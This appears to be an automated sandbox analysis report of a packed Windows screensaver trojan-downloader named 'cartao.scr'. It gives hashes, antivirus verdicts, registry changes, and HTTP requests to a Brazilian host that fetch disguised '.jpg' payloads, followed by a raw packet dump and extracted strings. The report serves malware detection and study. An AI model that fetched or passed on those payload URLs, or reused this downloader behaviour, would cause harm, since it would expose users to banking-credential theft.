Analysis Date2015-01-24 12:10:59
MD5b1ed96183c5acfa6dc76305eabff686c
SHA191a41ede93b9b180cb149c4a6039754037af61e4

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section md5: adb0dcc54acc189673b357d844a2e2d0 sha1: daedbb366ea9fb08f4666d97bfe4645ecc180b29 size: 167936
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.petite md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section md5: d503ebc2deda47e54e9c7fb3aeed4d7a sha1: 905e0aa16dcfe4417f90c3874d2f7946153d3675 size: 512
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section md5: 332f9609f2c5d0d7dd2053c094ddeb87 sha1: 58bbb34422b29027abe8d8af49660489283b8802 size: 24150
Section md5: 723fac501966f4b57e27eb06b0365a9c sha1: e34a0f49389b29d2ba7d18609354ee6db581ffcc size: 1536
Timestamp1992-06-19 22:22:17
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: cartao.scr
FileVersion: 7.0.7.409
CompanyName: Borland Software Corporation
PrivateBuild:
LegalTrademarks: Copyright © Borland Software Corporation 1990, 2001
Comments:
ProductName:
ProductVersion: 8.0
FileDescription: Flash mensage
OriginalFilename: cartao.scr
PackerPetite v?.? (after v1.4)
PEhashe47e19705eb12f682b9e7638468735815d677ae2
IMPhash1ebcff0797142335f74d1006c8c5aced
AV360 Safeno_virus
AVAd-Awareno_virus
AVAlwil (avast)VB-FX [Wrm]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Trojan-disguised-based!Maxi
AVAvira (antivir)TR/Dldr.Delphi.Gen
AVBullGuardno_virus
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVBC.Heuristic.Trojan.SusPacked.BF-6.A
AVDr. WebTrojan.DownLoader1.1259
AVEmsisoftno_virus
AVEset (nod32)Win32/TrojanDownloader.Banload.LNU
AVFortinetPossibleThreat
AVFrisk (f-prot)W32/Trojan-disguised-based!Maxi
AVF-Secureno_virus
AVGrisoft (avg)PSW.Banker
AVIkarusTrojan-Downloader.Win32.Small
AVK7Trojan ( 7000000f1 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesno_virus
AVMcafeeGeneric.dx!B49407248BC3
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Banload.OY
AVMicroWorld (escan)no_virus
AVRisingno_virus
AVSophosno_virus
AVSymantecInfostealer.Bancos!gen
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates MutexSTFK MutexXx
Winsock DNSwww.myrna2010.hpg.com.br
Winsock URLhttp://www.myrna2010.hpg.com.br/mcitane1.jpg
Winsock URLhttp://www.myrna2010.hpg.com.br/winset.jpg

Network Details:

DNSwww.myrna2010.hpg.com.br
Type: A
187.31.64.20
HTTP GEThttp://www.myrna2010.hpg.com.br/mcitane1.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.myrna2010.hpg.com.br/winset.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 187.31.64.20:80
Flows TCP192.168.1.1:1033 ➝ 187.31.64.20:80

Raw Pcap
0x00000000 (00000)   47455420 2f6d6369 74616e65 312e6a70   GET /mcitane1.jp
0x00000010 (00016)   67204854 54502f31 2e310d0a 41636365   g HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000030 (00048)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000040 (00064)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000090 (00144)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000a0 (00160)   0d0a486f 73743a20 7777772e 6d79726e   ..Host: www.myrn
0x000000b0 (00176)   61323031 302e6870 672e636f 6d2e6272   a2010.hpg.com.br
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000d0 (00208)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f77696e 7365742e 6a706720   GET /winset.jpg 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e6d79 726e6132   Host: www.myrna2
0x000000b0 (00176)   3031302e 6870672e 636f6d2e 62720d0a   010.hpg.com.br..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a0d0a            -Alive......


Strings
.(
.A
.
..
..
-.
.
b..$...
(
..
 
.!v
#...
081604E4
333f3
7.0.7.409
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
Borland Software Corporation
 Borland Software Corporation 1990, 2001
cartao.scr
Comments
CompanyName
Copyright 
DLGTEMPLATE
DVCLAL
f3fff
FileDescription
FileVersion
Flash mensage
InternalName
LegalCopyright
LegalTrademarks
MAINICON
OriginalFilename
PACKAGEINFO
PREVIEWGLYPH
PrivateBuild
ProductName
ProductVersion
StringFileInfo
TFORM1
Translation
VarFileInfo
VS_VERSION_INFO
```&&&&&&&&&
>*`'<,
)^01e$
@0A,d"
0J5pIA
),0k/z+
<0M)=4!
0Rq|Yz
1^4c9b4I;
15r=p:
1"~6DRH
;1BsVC%
1F0@'v
`1SK}b
]2<&\7
2lbG0^
3 ! 0>".;
33333337
33\hfw
:3q\LH"K
<3rdJr
3s,*!>^
3S3333;
3t#XXc"	s[
!/<,4#
44wwwwwww
*4-d]?A
4*n ?_
4N[4<!1
#`4P@?
4;R\qmijJ
]_4[Y"i
55DBT+D
&&%:56
5}J7}x'
5 Nc;hn
/5N}HU
5_S=SR
5"Y5i?$>k
`65&:J
(6/%8]
6\8'B;
6A3TD0|^
>6aM1?
"6CQD^3D
6DLe2"-	}z
)6'J8EAw\|s
6L)<9pl
6||{T7S
$7( / 2
7DU[/:7
7(]$I<08;
~7j]P|W+
8D"DWIx
8DHo|D7%
8=H)>N&
8M4*4*
8NG>9/
!8P1sZ
@<907553:
96AiF|8
&9$:*7
(?9AF"
@9D.D(
9F_V{V_
=9*$h2u
9hTT89@
9J2$e#N]HOz4MJF
9O_P|L
9}QMu&
A#0.D$2=H1gl
a^7qcy)
#a7rA1bqP
@\ABdB
advapi32.dll
_A{-eQ)~ 
>Ai5  
]Air`Vq
*aLSC~.D!
*amfb`v1#a
ANM._|v
aS[U3l
auCnqE
Awf$&Ib
`	axZ+
:aY<0=
ayCjNuN
baMY<"
B$AZn,
]b=DKx
BDPU]bsX
bj{n#hVB
B*_kA9
BlGnDp]r
bmyn)Df
bqruje$q
BRWW+Qx
	BtM0K
BxYOeJ
~C6S{%
Cax]E/]	 
C)d6P L
@.cgceb%
@>CG(Q]s
CK}&rv#CS
+c,L3T
Coj0:m!B
comctl32.dll
Compressed by Petite (c)1999 Ian Luck.
Corrupt Data!
cQv,;i
\C;"T	
cZt(WA_
d7MHr4
^dbQT{@
&D:c2D\
]DEGq|
 d}Fz|`
" "DhX
DlSm$&
 'D@o]
~Du.Qu
d(U"s9
dV_[x9<I
E2B$_F
e35 P~QC80@QDd
EES<O~
(eF@r>
e?fTJ^
eLFI0c<
EOLQ(>!,
e)Q"e.
]EqEvq3
ERROR!
ET(;pJ
E,Wp_.
ExitProcess
f/0bfa
F734]n\T`
FdCf@hAj
F@E&GH
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
F"~HDfV
F=LP>T
(.fO6ZF^
:fqJwa*6
f;W(Hs
?&G)2Q
G30xp4;
g6AqtC
"<g"9`
gB}GXI
GCJEK%
gdi32.dll
GetProcAddress
GkE!*l
)G&*l4(
},+gm4?
gMj35O
:Go7K`
GR\-5l5
'/#gRA}
G}scB _
/g*u6}R
g}WBPU
h'<bEP
hC~HH,J
H#E}( 
h.__fw(
h*g'<[
HKr!Q.QmG
$H!">L7ZU
hMj@4n
@'h*mU
\hn~ce
HNPUmP
HOdM"~
H^PO_JLU
 /*?Hq~"N@bu
HQP^0>QP'~
Hq=pd{
h<t";r
-}hZdC|
i)7"Q-
ImageList_Add
\IpaZQF
ipo$toZ
IuP!E,
/I:USD
Ivpt[]
I)!/YD
i\ZUCKWG
j902M4
:Ja>y:
/j; 'C(
`````````JCD&&&&&&
``````JCD&&&&&&&&&
```&&&JCD&&&&&&&&&
```JCD```
```JCDJCDJCDJCD&&&&&&
[JFC^Zz
j|mnpA
jM=q'N 
jq,'"VS
jqwq]%
^J]wZ~
^jxcekY
k!8:[o
k.E)43
^K-~~elCu\
kernel32.dll
kI"k4G
kMvu0xz|B
(ky3Qs
L+1D	j
LH7xxx
?|\LHw
LIER_}[
L\-$Is
-lj @X
L.JX0LK
LoadLibraryA
LocalAlloc
lqJILF;
Lq=}nuY
lsjbYlw
Ls_UAa
":lX!I@0="
LYE#6hn8cw
m+0ybZ
m6~hJw
MessageBoxA
MFlwA^Q
Mf>\-n
mKE[B"qV
%mnn:<l
Mo"\BC
!M{V4k
\Mwn4In
n"50eH
NbU;])l
^##,\Nd
/@NEG>E
@\NEXL
NHIRLMUMN&''
NM7E47
nMBR4,
NoV{Ro0
npC}'&
NTKVHXyZ
*[ntwJle
nUEU,%
`NuH]zw
{[[]NVM
O2C.dm
O2X`Sa
o9b@6@"@
oleaut32.dll
oMc_43
@@@O@ncm
On$QRTHFH
[OnUs{
oW8L3S
O*Xxf^d
:/"P'0"
P]B:[]7
@_[P\EBL
.petite
pGC>\Km
PH~-po
P?.k*a)
$`PMAw
PM\l4x
~pOo}km
pzO_MV
`qbDszp
;QeR*-c
*[!Q"g
QiMVPVLX
(Qi=Q4f
QNDJXZMS
"QUb	g
)q'uYu^
]QW@XGMR
q\x7nA
QYZT88
`Q%Z$c
ratqFxq
~"&rBN
#R%D5?
RegCloseKey
}rF.0o
RGuDr,
r;h;8N
]r&hlG
Ri2%QO
rJ-`b9j4r
RLWNTPMR
r_NWm[U MR
rQ}Tyg
_[RVQEUK
r$ZGO'
rzlZ'&":
.rz-#P
s[`1e8&,
s333333333
SaveDC
,Sc2K2
SCpGET
Sece7O
s]<]}G
s)&-HA
$}S?M;
sm1f:x
SrMjb4j
$SsEqK
su/&, 
svw_QY
s@y$_3
SysFreeString
t4-^0P}>
[Td?*X
tFhoqVO
TF@toD
t^`H8d
This program must be run under Win32
tKQ Ig+
TLm>*%
TM?b R
TMD:4.
TMD&46
[}TM@H
 T}]mu
T?;n)]
TQREhb
T_qSXvlgM
	TR4}PR)
tuu]_^SLN
^t[vXxIz
TwWc7	
TYO/}/=
U$$#@)
/>,@UB
U@D(GF*f
_`!"=>	Ugh
|UGK.WO
UKMdQ_
umTCiZ
UMTs	1nSI
U[%Pl$
Ur0|A]j
URLDownloadToFileA
URLMON.DLL
user32.dll
u(T53B
utx!7j<
uuA}8mX9
UW7WQh[
u`w(Jq
[UW_LPV
uW}t?4{
|uX.!+
uX	UDQ
uzHVL`W3
`+%$'%v
VA3*aS
VariantCopy
VerQueryValueA
version.dll
VirtualProtect
v(*"kT
;vKtOK
V{$Tg2
VV"W_[
v _W_]
v:W@mX
=. ,W+
]W0),I-$
@ W7u*lDw
/	wC7	
w\d+Kk
WGPotl
WJG@_[
$w}[lDI
wMKO4S
$	WMqo
wnLBF 
{woFfhZ
woo ,l
WPW| 4
WQ3L[k
wsprintfA
w-u*z4?
WWW`8|
wwwQMM
wwwwww
wwwwwwwwws
wwwwwwwwwwwp
wwwwwwwwwwwwwwwww
wwwwwwwwwwwwwwwwww
	X56D%
`X5g|[<
x"$ac=
@xA(dJ
@xAvdj
x|B/ X,d2
x*C-an
X."ENN
x&G#Ho
^Xh:u\
XN\^I_
Xph_U[V
X@*tS-
X"uY0,
&[Xx"JCH
xxxxxx
xxxxxxxx
y1tHp@,(
|y8DI;%
(<yb5*}
}yc~hz
,Ydd5,y>
yMM-!x
Z:7_VP
Z`A5]4d
zD5_kO
zDIa)B
ze!&zr]
z} @ft
ZML64$
+ZTWW4OE
Z;<uCW